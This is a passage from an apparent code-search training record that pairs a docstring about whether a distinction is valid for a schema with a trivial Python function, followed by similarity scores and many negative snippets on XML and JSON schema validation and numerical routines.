"def __calc_concentration(self, diam, data, dmin, dmax):\n\n dp = np.log10(diam*1e-9)\n conc = data # smoothed\n dmin = np.max((np.log10(dmin),dp[0]))\n dmax = np.min((np.log10(dmax),dp[-1]))\n dpi = np.arange(dmin,dmax,0.001)\n conci = np.sum(interp1d(dp,conc,kind='nearest')(dpi)*0.001,axis=1)\n return conci",
"def chebint(self, a, b, c, n):\n sum = 0.0\n fac = 1.0\n con = 0.25 * (b - a) # factor that normalizes the interval\n cint = numpy.zeros(n)\n for j in range(1, n - 2):\n cint[j] = con * (c[j - 1] - c[j + 1]) / j\n sum = sum + fac * cint[j]\n fac = - fac\n cint[n - 1] = con * c[n - 2] / (n - 1)\n sum = sum + fac * cint[n - 1]\n cint[0] = 2.0 * sum # set constant of integration.\n return (cint)",
"def number_weakly_connected_components(G):\n return sum(1 for wcc in weakly_connected_components(G))",
"def combinations(n) -> float:\r\n c = math.factorial(n) / (math.factorial(2) * math.factorial(n - 2))\r\n return c",
"def num_quadrature_points(self) -> int:",
"def n(self):\n if not self.table:\n return 0\n return max(self.omega) + 1",
"def num_cones(self):\n return self._shape_count(_sff.cone)",
"def number_of_constituents(bc_class):\n num_trn = 0\n cn = bc_class.constituent_properties\n if cn.salinity:\n num_trn += 1\n if cn.temperature:\n num_trn += 1\n if cn.vorticity:\n num_trn += 1\n if not cn.general_constituents.empty:\n num_trn += len(cn.general_constituents.index)\n if not cn.sand.empty:\n num_trn += len(cn.sand.index)\n if not cn.clay.empty:\n num_trn += len(cn.clay.index)\n return num_trn",
"def calc_process_coupling_cohesion_ratio(partitions, graph):\n cp = calc_process_coupling(partitions, graph)\n ch = calc_process_cohesion(partitions, graph)\n if cp == 0 or ch == 0:\n pccr = 0\n else:\n pccr = cp / ch\n return float(pccr)",
"def number_of_basis(self):\n return self._pre_kernel.shape[0]",
"def conjgradient(x, p, gprev, gnew):\r\n gnew = np.array(gnew)[np.newaxis]\r\n gprev = np.array(gprev)[np.newaxis]\r\n gnew = gnew.T\r\n gprev = gprev.T\r\n beta = (gnew.T)@gnew/((gprev.T)@gprev)\r\n gnew = gnew.flatten()\r\n beta = beta.flatten()\r\n p = -gnew + beta*p\r\n return p",
"def gates_per_clifford(qobj_list, clifford_length, basis, qubits):\n\n #TO DO\n\n pass",
"def g(i):\n return int(np.log2(gc(i)^gc(i+1)))",
"def preCondConjugateGradientSolver(b, x, linsys_setup, eps, i_max, plotInterval, mapDir):\n datamaps, ninvs, beams, freqs, power_2d, precond_2d, clumaps, g_nu, \\\n map_prop = linsys_setup\n nx, ny, pixScaleX, pixScaleY = map_prop\n nCluster = len(clumaps[0])\n ksz = False\n if len(clumaps)==2: ksz=True\n \n \n # Calculate residual r = b - (A^-1) x\n r = b - applyMat(x, linsys_setup)\n d = r\n\n\n delta_new = numpy.inner(r,r)\n \n\n\n\n delta_o = delta_new\n delta_array = numpy.zeros(shape=(i_max))\n \n # Iterate CG solver until converged\n i = 0\n #i_max = 300\n while (i < i_max) and (delta_new > delta_o*eps**2.):\n if i==0: t = time.time()\n \n if i%plotInterval == 0 and i != 0:\n print \"\\tNumber of iterations in the CG:\", i\n x0 = x[:nx*ny] # CMB\n x1 = x[nx*ny:nx*ny+1] # Monopole\n x2 = x[nx*ny+1:nx*ny+1+nCluster] # TSZ\n if ksz: x3 = x[nx*ny+1+nCluster:nx*ny+1+2*nCluster]\n print \"\\tMonopole:\", x1\n print \"\\tTSZ:\", x2\n if ksz: print \"\\tKSZ:\", x3\n \n x0.shape = (ny,nx)\n a_l = numpy.fft.fft2(x0)\n a_l *= precond_2d\n x_test = numpy.real(numpy.fft.ifft2(a_l))\n plot(x_test,mapDir+'/CMB_%d.png'%i,'Reconstructed CMB', range=(-250., 250.))\n print delta_new, delta_o*eps**2.\n\n q = applyMat(d, linsys_setup)\n alpha = delta_new / (numpy.inner(d,q))\n x += alpha * d\n\n # What does this do? It's always false.\n if i/50. < numpy.int(i/50):\n r = b - applyMat(x, linsys_setup)\n else:\n r = r - alpha*q\n \n delta_old = delta_new\n delta_new = numpy.inner(r,r)\n beta = delta_new/delta_old\n d = r + beta * d\n #if i==0: print \"\\tEach iteration takes:\", time.time()-t\n i += 1\n\n x0 = x[:nx*ny].reshape((ny, nx))\n x1 = x[nx*ny:nx*ny+1]\n x2 = x[nx*ny+1:nx*ny+1+nCluster]\n if ksz:\n x3 = x[nx*ny+1+nCluster:nx*ny+1+2*nCluster]\n else:\n x3 = None\n \n a_l = numpy.fft.fft2(x0) * precond_2d\n x0 = numpy.real(numpy.fft.ifft2(a_l))\n\n \n # CMB, monopole, TSZ, KSZ\n return x0, x1, x2, x3",
"def getNchan(self):\n return self.shape(squeeze=False)[2]"
] | [
"0.64773166",
"0.6208632",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6151681",
"0.59326756",
"0.57995605",
"0.5736376",
"0.57172483",
"0.56418824",
"0.56189567",
"0.5617056",
"0.56133074",
"0.5544068",
"0.5518845",
"0.5512459",
"0.5510861",
"0.5497847",
"0.54915833",
"0.5452297",
"0.5414389",
"0.54006386",
"0.53961194",
"0.53868425",
"0.53867835",
"0.53748757",
"0.5370777",
"0.5368838",
"0.5362584",
"0.5321145",
"0.5315969",
"0.5307401",
"0.52974194",
"0.52968496",
"0.5282425",
"0.5270975",
"0.5260923",
"0.52567816",
"0.52294683",
"0.5225834",
"0.5225158",
"0.52087206",
"0.5166774",
"0.5160155",
"0.5160097",
"0.5144479",
"0.5133213",
"0.51242626",
"0.5118077",
"0.5107299",
"0.5106225",
"0.5105231",
"0.5104786",
"0.5099496",
"0.5098425",
"0.5076469",
"0.5076469",
"0.50547254",
"0.50510764",
"0.50482404",
"0.5045521",
"0.5040215",
"0.503754",
"0.5017839",
"0.5010152",
"0.5000853",
"0.49967533",
"0.49966928",
"0.4994813",
"0.4991778",
"0.4988773",
"0.4984413",
"0.49843803",
"0.4983678",
"0.49811283",
"0.49788833",
"0.49752593",
"0.4973031",
"0.497303",
"0.49717408",
"0.4967934",
"0.4966413",
"0.49574354",
"0.49563715",
"0.4950946",
"0.49492103"
] | 0.56668746 | 23 |
Given a schema, return True if this type of distinction is valid for the schema. Default is True. Should be overridden if there are any schemas a distinction is not valid for. | def isValidForSchema(schema):
return True | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def is_a_dde_schema(self, schema):\n return schema in self.registered_dde_schemas",
"def compatibleSchema(self,\n schema: schemaconverter.TDXSchema,\n raise_error: bool = True\n ) -> bool:\n db_tdx_schema = self.tdx_schema\n # see https://stackoverflow.com/a/41579450/10149169\n is_subset = db_tdx_schema.items() <= schema.items()\n if not is_subset and raise_error:\n raise ValueError((\n \"The given database schema is not compatible with the\"\n \" existing database schema. The given schema was {}\"\n \" but the existing schema was {}\").format(\n schema, db_tdx_schema))\n return is_subset",
"def is_a_dde_schema(schema):\n return schema in registered_dde_schemas()",
"def validate_schema(self, schema):\n json_schema_path = os.path.join(_ROOT, 'data', 'schema.json')\n json_schema = load_json_or_yaml(json_schema_path)\n return validate(schema, json_schema)",
"def schemaIsValid(self):\n ret = libxml2mod.xmlSchemaIsValid(self._o)\n return ret",
"def has_schema_url(self):\n return self.get_schema_url() is not None",
"def can_access_schema(self, datasource: \"BaseDatasource\") -> bool:\n\n return (\n self.can_access_all_datasources()\n or self.can_access_database(datasource.database)\n or self.can_access(\"schema_access\", datasource.schema_perm or \"\")\n )",
"def is_schema_types_valid(self):\n valid_types = {\"string\", \"int\", \"float\", \"datetime\", \"boolean\"}\n invalid_types = []\n if self.schema_content:\n for dataset in self.schema_content:\n attributes = self.schema_content.get(dataset)\n for attr in attributes.values():\n type_to_validate = attr.get(\"type\")\n if type_to_validate not in valid_types:\n invalid_types.append(type_to_validate)\n\n if invalid_types:\n error_message, error_code = Errors.modeling_rule_schema_types_invalid(\n invalid_types\n )\n if self.handle_error(\n error_message, error_code, file_path=self.file_path\n ):\n self._is_valid = False\n return False\n return True",
"def is_schema_valid(self, schema):\n for k, v in schema.items():\n if v[0] == \"var_len\":\n assert len(v) == 2\n assert v[1] in TF_VALUE\n\n if v[0] == \"fixed_len\":\n assert len(v) == 3\n assert v[1] in TF_VALUE\n assert isinstance(v[2], list)",
"def schema_valid(arch, **kwargs):\n validator = relaxng(arch.tag)\n if validator and not validator.validate(arch):\n result = True\n for error in validator.error_log:\n _logger.error(tools.ustr(error))\n result = False\n return result\n return True",
"def equals(self, other: Schema) -> bool:\n if not isinstance(other, Schema):\n raise TypeError(\n f\"invalid equality comparison between Schema and {type(other)}\"\n )\n return self.__cached_equals__(other)",
"def equals(self, other: Schema) -> bool:\n if not isinstance(other, Schema):\n raise TypeError(\n f\"invalid equality comparison between Schema and {type(other)}\"\n )\n return self.__cached_equals__(other)",
"def _validate_bool(instance: typing.Dict[str, typing.Any], schema: typing.Dict[str, typing.Any], path: typing.List[str]) -> None:\n if not isinstance(instance, dict):\n raise ValidationError('instance must be dict', path)\n valid_keys = {'_type', 'value'}\n required_keys = valid_keys\n schema_keys = set(instance.keys())\n invalid_keys = schema_keys - valid_keys - opt_federation_keys\n if invalid_keys:\n raise ValidationError('unexpected keys in schema: {}'.format(invalid_keys), path)\n missing_keys = required_keys - schema_keys\n if missing_keys:\n raise ValidationError('missing keys in schema: {}'.format(missing_keys), path)\n if instance['_type'] != 'bool':\n raise ValidationError('expected _type \"bool\"', path)\n if not isinstance(instance['value'], bool):\n raise ValidationError('value must be bool', path)",
"def validate(self, schema=os.path.join(os.path.dirname(__file__), 'am.xsd')):\n return validate_xml(schema, self.path, from_path=True)",
"def validate(self):\n\n # clear any previous xml errors\n clear_error_log()\n if self.schema_file is not None:\n try:\n # Attempt parsing the schema file\n schdoc = parse(self.schema_file)\n except XMLSyntaxError as e:\n # The schema was not parsable XML\n logging.warning('The schema XML file could not be parsed.')\n for item in e.error_log:\n logging.info(item)\n\n return False\n\n try:\n schema = XMLSchema(schdoc)\n except XMLSchemaParseError as e:\n # The schema document is XML, but it's not a schema\n logging.warning(\n 'The schema XML file was parsed, but it does not appear to be a valid XML Schema document.'\n )\n for item in e.error_log:\n logging.info(item)\n\n return False\n\n try:\n # Attempt parsing the data file\n data = parse(self.datafile)\n except XMLSyntaxError as e:\n # The data was not parsable XML\n logging.warning('The data XML file could not be parsed.')\n for item in e.error_log:\n logging.info(item)\n\n return False\n\n if self.schema_file is not None:\n if schema.validate(data):\n self.data = data\n return True\n\n logging.warning(\n 'The data does not conform to the provided schema.')\n for item in schema.error_log:\n logging.info(item)\n\n return False\n\n self.data = data\n\n return True",
"def isValid(dp: frictionless.package.Package, new_dp: frictionless.package.Package):\n val = frictionless.validate(new_dp)\n if (\n val[\"valid\"]\n and dp[\"resources\"][0][\"schema\"] == new_dp[\"resources\"][0][\"schema\"]\n ):\n logging.info(\"Returning valid and schema-compliant data\")\n return True\n else:\n logging.error(\"Data is not valid or the schema has changed\")\n print(val)\n return False",
"def validate_json(schema, doc):\n is_invalid = set(doc).difference(set(schema))\n if is_invalid:\n return False\n return True",
"def _schema_valid_prod(self, table: TableSchema) -> bool:\n disk_schema = self._get_stored_schema(table['name'])\n if not disk_schema:\n return False\n \n # Column and field order will probably not match\n # TODO don't call update_table_schema twice\n _, alter_reqs = update_table_schema(disk_schema, table)\n return len(alter_reqs) == 0",
"def validate(self) -> bool:\n\n # Start by reading in the blueprint schema json\n schema = json.loads(pkgutil.get_data(\"FactorioTools\", \"blueprintSchema.json\"))\n\n # Validate the object's schema against the blueprintSchema JSON\n try:\n jsonschema.validate(self.data, schema)\n return True\n except jsonschema.ValidationError:\n pass\n\n return False",
"def has_desired_schema(self):\n if self._new_table == self._old_table:\n if not self.rebuild:\n log.info(\"Table already has the desired schema. \")\n return True\n else:\n log.info(\n \"Table already has the desired schema. However \"\n \"--rebuild is specified, doing a rebuild instead\"\n )\n return False\n return False",
"def validate_subset_of_schema(self, schema):\n self.validate_schema_type(schema)\n\n if self.name != schema.name:\n raise AttributeSchemaError(\n \"Expected name '%s'; found '%s'\" % (schema.name, self.name)\n )\n\n if self.exclusive != schema.exclusive:\n raise AttributeSchemaError(\n \"Expected exclusive '%s' for attribute '%s'; found '%s'\"\n % (schema.exclusive, self.name, self.exclusive)\n )\n\n if self.default != schema.default:\n raise AttributeSchemaError(\n \"Expected default '%s' for attribute '%s'; found '%s'\"\n % (schema.default, self.name, self.default)\n )",
"def validate_schema(self, schema):\n if type(schema) is not type(self):\n raise AttributeSchemaError(\n \"Expected schema to have type '%s'; found '%s'\"\n % (type(self), type(schema))\n )\n\n if schema.name != self.name:\n raise AttributeSchemaError(\n \"Expected schema to have name '%s'; found '%s'\"\n % (self.name, schema.name)\n )",
"def validate_schema(doc_xml, schema_xml=None):\n doc_dml = deepcopy(doc_xml)\n\n doc_new = etree.Element(doc_xml.tag, nsmap={None: 'http://www.sii.cl/SiiDte'})\n doc_new[:] = doc_xml[:] # move children into new root\n doc_new.attrib.update(doc_xml.attrib) # copy attributes of the root node\n\n # reload xml\n buff = BytesIO(etree.tostring(doc_new, method='c14n'))\n xml = etree.parse(buff).getroot()\n\n if not schema_xml:\n schema_pth = resolve_schema(doc_xml)\n\n with open(schema_pth, 'rb') as fh:\n schema_dml = etree.parse(fh)\n\n schema = etree.XMLSchema(schema_xml)\n schema.assertValid(dml)\n\n return True # if no assertion gets thrown above, we can safely assume a `True` validity. ",
"def schemaExists(self, schema):\r\n r = self.fetchSqlRecords(\r\n \"SELECT count(*) FROM information_schema.schemata WHERE schema_name = '{}'\".format(schema))\r\n return r[0][0] > 0",
"def validate_class_schema(self, schema):\n json_schema_path = os.path.join(_ROOT,\n 'data',\n 'class_json_schema.json')\n json_schema = load_json_or_yaml(json_schema_path)\n return validate(schema, json_schema)",
"def _verify_schema(schema):\n assert type(schema) in [dict, tuple], f'Expected a dict or a tuple but got {type(schema)}'\n if isinstance(schema, tuple):\n assert len(schema) == 2, f'Expected a tuple with length 2 but got length {len(schema)}'\n if schema[1] is not None:\n assert isinstance(schema[1], schema[0]), f'{str(schema[1])} does not have expected type {str(schema)}'\n elif isinstance(schema, dict):\n for sub_schema in schema.values():\n _verify_schema(sub_schema)",
"def validate(self, descriptor, schema_id):\n try:\n jsonschema.validate(descriptor, self.load_schema(schema_id))\n return True\n\n except ValidationError as e:\n log.error(\"Failed to validate Descriptor against schema '{}'\"\n .format(schema_id))\n self.error_msg = e.message\n log.error(e.message)\n return\n\n except SchemaError as e:\n log.error(\"Invalid Schema '{}'\".format(schema_id))\n self.error_msg = e.message\n log.debug(e)\n return",
"def check_schema_uri(self):\n import asdf\n\n if self.schema_uri is not None:\n with log.augment_exception(\"Invalid ASDF schema URI:\", self.schema_uri):\n asdf.schema.load_schema(self.schema_uri)",
"def is_schema_compatible(self, for_writing_operations_too=False) -> bool:\n _LOG.debug(\n \"software.version\",\n postgis=_schema.get_postgis_versions(self._engine),\n explorer=explorer_version,\n )\n if for_writing_operations_too:\n return _schema.is_compatible_generate_schema(self._engine)\n else:\n return _schema.is_compatible_schema(self._engine)",
"def test_validate_schema(schema_path):\n # Make sure that each schema itself is valid.\n schema_tree = schema.load_schema(schema_path, resolve_references=True)\n schema.check_schema(schema_tree)",
"def validate_json_schema(self, json_schema):\n cls = validators.validator_for(json_schema)\n cls.check_schema(json_schema)",
"def _validate_against_schema(self, strand, data):\n schema = self._get_schema(strand)\n\n try:\n jsonschema_validate(instance=data, schema=schema)\n logger.debug(\"Validated %s against schema\", strand)\n\n except ValidationError as e:\n raise exceptions.invalid_contents_map[strand](str(e))",
"def checkProfileAgainstSchema(profile, schema):\n # what is required in a profile? use the json schema\n try:\n jsonschema.validate(profile, schema)\n except jsonschema.ValidationError as e:\n rsvLogger.exception(e)\n rsvLogger.info('ValidationError')\n return False\n except jsonschema.SchemaError as e:\n rsvLogger.exception(e)\n rsvLogger.info('SchemaError')\n return False\n # consider @odata.type, with regex\n return True",
"def is_standard(schema_obj):\n\n if isinstance(schema_obj, schema.Field):\n return is_standard(schema_obj.struct_type)\n elif isinstance(schema_obj, schema.Struct):\n standard_types = [\n 'google.protobuf.Duration',\n 'google.protobuf.Timestamp',\n 'weave.common.ResourceId',\n 'weave.common.ResourceName',\n ]\n return schema_obj.full_name in standard_types\n return False",
"def _validate(self):\n schema_version = util.schemas[self.schema_name]\n stored_schemas = util.stored_schemas\n\n try:\n schema_obj = stored_schemas[\n \"http://redfish.dmtf.org/schemas/v1/\" + schema_version]\n except KeyError:\n raise OneViewRedfishError(\"{} not found\".format(schema_version))\n\n resolver = jsonschema.RefResolver('', schema_obj, store=stored_schemas)\n jsonschema.validate(self.redfish, schema_obj, resolver=resolver)",
"def validate_property_schema(self, schema):\n json_schema_path = os.path.join(_ROOT,\n 'data',\n 'property_json_schema.json')\n json_schema = load_json_or_yaml(json_schema_path)\n return validate(schema, json_schema)",
"def validate(self, schema=None, callback=None):\n return hxl.schema(schema, callback).validate(self)",
"def is_valid(self):\n try:\n self.validate()\n return True\n except (TypeError, ValueError) as e:\n return False",
"def validate(xml_document, schema=None, cls=None, path=None, schema_path=None,\n use_defaults=True, namespaces=None, locations=None, base_url=None,\n defuse='remote', timeout=300, lazy=False):\n source, schema = get_context(\n xml_document, schema, cls, locations, base_url, defuse, timeout, lazy\n )\n schema.validate(source, path, schema_path, use_defaults, namespaces)",
"def validate(json_resp, schema, validictory_path, schema_base=None):\n # assumes /extern/validictory exists (see /cm for instructions)\n if not validictory_path in sys.path:\n sys.path.append(validictory_path)\n import validictory\n\n try:\n if schema_base and not json_resp[\"$schema\"].startswith(schema_base):\n print \"Warning: JSON schema is \", json_resp[\"$schema\"], \"instead of \", schema_base\n validictory.validate(json_resp, schema, required_by_default=False)\n return True\n except Exception as e:\n print \"Received exception %s while trying to validate: %s\" % (\n str(e), json_resp)\n return False",
"def validate(self, fqn, data, errors):\n\t\terrors.append(\"{}: validate() must be implemented for SchemaBase derived classes.\".format(self.__class__.__name__))\n\t\treturn False",
"def validate(self, json_data):\n self._errors = None\n success = True\n for item in self._schema:\n if not item.validate(json_data):\n success = False\n\n return success",
"def is_json_valid(json_data: dict, json_schema: dict) -> bool:\r\n try:\r\n validate(instance=json_data, schema=json_schema)\r\n except jsonschema.exceptions.ValidationError as err:\r\n return False\r\n return True",
"def match_schemas(w_schema, r_schema):\n if isinstance(w_schema, dict) and isinstance(r_schema, dict):\n # Array, Map, Enum, Fixed, Record, Error\n w_type = w_schema['type']\n r_type = r_schema['type']\n if w_type != r_type:\n return False\n if w_type == 'array':\n # 'Both schemas are arrays whose item types match'\n return match_schemas(w_schema['items'], r_schema['items'])\n elif w_type == 'map':\n # 'Both schemas are maps whose value types match'\n return match_schemas(w_schema['values'], r_schema['values'])\n elif w_type in ('enum', 'record', 'error'):\n # 'Both schemas are enums whose names match'\n # 'Both schemas are records with the same name'\n # Note: Futher checks must be applied after data is read in\n # `read_enum()` and `read_record()`\n return w_schema['name'] == r_schema['name']\n elif w_type == 'fixed':\n # 'Both schemas are fixed whose sizes and names match'\n return (\n w_schema['name'] == r_schema['name'] and\n w_schema['size'] == r_schema['size']\n )\n elif w_type == r_type:\n # Unknown type - just return True\n return True\n\n elif isinstance(w_schema, list) or isinstance(r_schema, list):\n # 'Either schema is a union'\n if isinstance(w_schema, list):\n # If the writer is a union, the check is applied in `read_union()`\n # when the correct schema is known.\n return True\n else:\n # If the reader is a union, ensure at least one of the schemas in\n # the reader's union matches the writer's schema.\n return any(match_schemas(w_schema, s) for s in r_schema)\n\n elif w_schema == r_schema:\n return True\n\n # Promotion cases:\n elif w_schema == 'int' and r_schema in ('long', 'float', 'double'):\n return True\n elif w_schema == 'long' and r_schema in ('float', 'double'):\n return True\n elif w_schema == 'float' and r_schema == 'double':\n return True\n elif w_schema == 'string' and r_schema == 'bytes':\n return True\n elif w_schema == 'bytes' and r_schema == 'string':\n return True\n\n return False",
"def is_valid(self) -> bool:\r\n try:\r\n self.shape\r\n return True\r\n except ValueError:\r\n return False",
"def _schema_has_sparse_features(schema: schema_pb2.Schema) -> bool:\n\n def _has_sparse_features(\n feature_container: Iterable[schema_pb2.Feature]\n ) -> bool:\n \"\"\"Helper function used to determine whether there are sparse features.\"\"\"\n for f in feature_container:\n if isinstance(f, schema_pb2.SparseFeature):\n return True\n if f.type == schema_pb2.STRUCT:\n if f.struct_domain.sparse_feature:\n return True\n return _has_sparse_features(f.struct_domain.feature)\n return False\n\n if schema.sparse_feature:\n return True\n return _has_sparse_features(schema.feature)",
"def is_valid(self) -> bool:\n return \\\n (self.spatial is None or all([v(self.spatial)\n for v, _ in self.spatial_validations])) \\\n and \\\n (self.temporal is None or all([v(self.temporal)\n for v, _ in self.temporal_validations]))",
"def validate_subset_of_schema(self, schema):\n super(BooleanAttributeSchema, self).validate_subset_of_schema(schema)\n\n if not self.values.issubset(schema.values):\n raise AttributeSchemaError(\n \"Values %s are not a subset of %s\"\n % (self.values, schema.values)\n )",
"def validate_against_schema(self, json_doc):\n if self.uri not in self.se.validation:\n raise RuntimeError(\"$validation is not defined for {} field; thus the json document could not be validated\".format(self.name))\n else:\n validate(json_doc, self.se.validation[self.uri])\n print('The JSON document is valid')",
"def validate(schema, record):\n if six.PY3:\n return Utils._py3_validate(schema, record)\n else:\n return Utils._py2_validate(schema, record)",
"def SchemaValidate(self, xsd):\n ret = libxml2mod.xmlTextReaderSchemaValidate(self._o, xsd)\n return ret",
"def schemaValidateDoc(self, doc):\n if doc is None: doc__o = None\n else: doc__o = doc._o\n ret = libxml2mod.xmlSchemaValidateDoc(self._o, doc__o)\n return ret",
"def validate(self, doc):\n return self.schema.validate(doc)",
"def validate_full_schema(self):\n #self.check_duplicate_labels()\n for record in self.extension_schema['schema']['@graph']:\n #self.check_whether_atid_and_label_match(record)\n if record['@type'] == \"rdfs:Class\":\n self.validate_class_schema(record)\n #self.validate_class_label(record[\"@id\"])\n self.validate_validation_field(record)\n elif record['@type'] == \"rdf:Property\":\n self.validate_property_schema(record)\n #self.validate_property_label(record[\"@id\"])\n #self.validate_domainIncludes_field(record[\"http://schema.org/domainIncludes\"])\n #self.validate_rangeIncludes_field(record[\"http://schema.org/rangeIncludes\"])\n #else:\n # raise ValueError('wrong @type value found: {}'.format(record))",
"def self_check(self, fqn, errors):\n\t\terrors.append(\"{}: self_check() must be implemented for SchemaBase derived classes.\".format(self.__class__.__name__))\n\t\treturn False",
"def validateXSD(cls,xmlstring,target):\n printMessage(cls,inspect.stack()[0][3],\n \"Validating against '%s' XSD..\"%(target))\n\n curdir = os.path.dirname(globals()['__file__'])\n if target==\"new\":\n xsd=\"%s/../bioinfer.xsd\"%curdir\n elif target==\"relaxed\":\n xsd=\"%s/../bioinfer.relaxed.xsd\"%curdir\n elif target==\"compatible\":\n xsd=\"%s/../bioinfer.relaxed.xsd\"%curdir\n else:\n printError(cls,inspect.stack()[0][3],\"Cannot validate '%s' format\"%target)\n return(False)\n \n doc = L.parseDoc(xmlstring)\n schemaCtxt = L.schemaNewParserCtxt(xsd)\n schema = schemaCtxt.schemaParse()\n validatorCtxt = schema.schemaNewValidCtxt()\n\n exitstatus = validatorCtxt.schemaValidateDoc(doc)\n valid = (exitstatus==0)\n if valid:\n printMessage(cls,inspect.stack()[0][3],\"Valid XML\")\n else:\n printError(cls,inspect.stack()[0][3],\"Invalid XML\")\n return(valid)",
"def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:",
"def validate_schema(self):\n\n _schema_translator = {\n 'dav': 'http',\n 'davs': 'https',\n }\n\n _logger.debug(\n \"[%s]Validating URN schema: %s\",\n self.id,\n self.uri['scheme']\n )\n\n if self.uri['scheme'] in _schema_translator:\n\n _logger.debug(\n \"[%s]Using URN schema: %s\",\n self.id,\n _schema_translator[self.uri['scheme']]\n )\n\n self.uri['scheme'] = _schema_translator[self.uri['scheme']]\n\n else:\n _logger.debug(\n \"[%s]Using URN schema: %s\",\n self.id,\n self.uri['scheme']\n )",
"def validate_changeset(cls, changeset):\n\n if \"author_id\" not in changeset or changeset[\"author_id\"] is None:\n app.logger.warning(\"Missing `author_id` in changeset\")\n return False\n\n if \"planet\" not in changeset or changeset[\"planet\"] is None or \"kind\" not in changeset[\"planet\"]:\n app.logger.warning(\"Missing `planet` or `planet.kind` in changeset\")\n return False\n\n p_cls = LinkPlanet if changeset[\"planet\"][\"kind\"] == \"link\" else LinkedPicturePlanet\n return p_cls.validate_changeset(changeset)",
"def validate(self):\n\n if self.validate_all_fields():\n return True\n return False",
"def is_vendor(schema_obj):\n\n return isinstance(schema_obj, schema.Vendor)",
"def validate_subset_of_schema(self, schema):\n self.validate_schema_type(schema)\n\n for name, attr_schema in iteritems(self.schema):\n if not schema.has_attribute(name):\n raise AttributeContainerSchemaError(\n \"Attribute '%s' does not appear in schema\" % name\n )\n\n other_attr_schema = schema.get_attribute_schema(name)\n attr_schema.validate_subset_of_schema(other_attr_schema)",
"def schema_check(self):\n\n try:\n self.schema.assertValid(self.get_content())\n except lxml.etree.DocumentInvalid:\n logger.error(\"PDU failed schema check\")\n for line in self.pretty_print_content().splitlines():\n logger.warning(line)\n raise",
"def valid_type(self, data, errors):\n\t\terrors.append(\"{}: valid_type() must be implemented for SchemaBase derived classes.\".format(self.__class__.__name__))\n\t\treturn False",
"def valid(schema=None):\n def dec(fun):\n @wraps(fun)\n def d_func(self, ctx, data, *a, **kw):\n try:\n validate(data['params'], schema)\n except ValidationError as err:\n raise InvalidParams(err)\n except SchemaError as err:\n raise InternalError(err)\n return fun(self, ctx, data['params'], *a, **kw)\n return d_func\n return dec",
"def generate_valid(schema):\n LOG.debug(\"generate_valid: %s\" % schema)\n schema_type = schema[\"type\"]\n if isinstance(schema_type, list):\n # Just choose the first one since all are valid.\n schema_type = schema_type[0]\n return type_map_valid[schema_type](schema)",
"def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n sparse_representation = tensor_representation.sparse_tensor\n if (len(sparse_representation.dense_shape.dim) != len(\n sparse_representation.index_column_names)):\n return False\n\n # All the index columns must be of integral types.\n for index_column in sparse_representation.index_column_names:\n depth, value_type = _GetNestDepthAndValueType(\n arrow_schema, path.ColumnPath(index_column))\n if depth != 1 or not pa.types.is_integer(value_type):\n return False\n\n depth, value_type = _GetNestDepthAndValueType(\n arrow_schema, path.ColumnPath(sparse_representation.value_column_name))\n return depth == 1 and _IsSupportedArrowValueType(value_type)",
"def is_valid(self, data_model: DataModel) -> bool:\n return all(constraint.is_valid(data_model) for constraint in self.constraints)",
"def is_valid(self, data_model: DataModel) -> bool:\n return all(constraint.is_valid(data_model) for constraint in self.constraints)",
"def is_valid_layout(self, layout):\n\n return layout in self._layout_infos",
"def is_typespace(schema_obj):\n\n return isinstance(schema_obj, schema.Typespace)",
"def __bool__(self):\n return self.is_valid",
"def is_valid(self):\n self.clean()\n return not bool(self.errors)",
"def is_valid(self):\n return _drafter.check_blueprint(self.content)",
"def _validate_against_schema(config):\n logging.info(\"Validating config file against the schema\")\n try:\n c = Core(source_data=config, schema_files=[CONFIG_SCHEMA])\n c.validate(raise_exception=True)\n except Exception as e:\n logging.error(\"Failed when validating schema: %s\", e)\n logging.info(\"Dumping rendered template:\\n%s\", dump_rendered_config_file(config))\n raise",
"def validate(cls,corpus,target):\n printWarning(cls,inspect.stack()[0][3],\n \"Preparing data for xsd validation..\")\n xmlstring = corpus.writeToString()\n printWarning(cls,inspect.stack()[0][3],\n \"Prepared\")\n xsd = Validator.validateXSD(xmlstring,target)\n semantic = Validator.validateSemantic(corpus,target)\n valid = (xsd and semantic)\n if not valid:\n printError(cls,inspect.stack()[0][3],\n \"Data not valid\")\n return(valid)",
"def validate(self, doc, schemaloc=False):\n if not (schemaloc or self._schemalocs):\n raise errors.ValidationError(\n \"No schemas to validate against! Try instantiating \"\n \"XmlValidator with use_schemaloc=True or setting the \"\n \"schema_dir param in __init__\"\n )\n\n root = utils.get_etree_root(doc)\n xsd = self._build_uber_schema(root, schemaloc)\n is_valid = xsd.validate(root)\n\n return XmlValidationResults(is_valid, xsd.error_log)",
"def is_valid_basis_instance(basis):\r\n\r\n sig = np.sin(2 * np.pi * np.arange(10)/10)\r\n shape = sig.shape\r\n\r\n try:\r\n conditions = [hasattr(basis, 'K'), hasattr(basis, 'projection'),\r\n callable(getattr(basis, 'projection', None)),\r\n isinstance(basis.projection(sig), np.ndarray),\r\n basis.projection(sig).shape == (basis.K,)+shape]\r\n except:\r\n return False\r\n\r\n return all(conditions)",
"def assertValid(self, doc):\n return self.schema.assertValid(doc)",
"def check_for_schema(cls):\n if not hasattr(cls, \"Schema\") or cls.Schema is None:\n raise PillowtalkError(\"Schema not found. @add_schema may not have been added to class definition.\")",
"def __bool__(self):\n return self.isValid()",
"def _is_instance_of(obj: dict, geojson_type: str) -> bool:\n try:\n schema_name = next(t + '.json' for t in GEOJSON_TYPES\n if t.lower() == geojson_type.lower())\n except StopIteration:\n raise GeoJSONError(f'Specified geojson_type ({geojson_type}) does '\n 'not match a supported GeoJSON type.')\n\n filename = DATA_DIR / schema_name\n with open(filename, 'r') as src:\n schema = json.load(src)\n\n return Draft7Validator(schema).is_valid(obj)",
"def is_common(schema_obj):\n\n return is_protobuf(schema_obj) or is_wdl(schema_obj)",
"def is_public(self):\n return self.schema_name == \"public\" or self.schema_name == \"test\"",
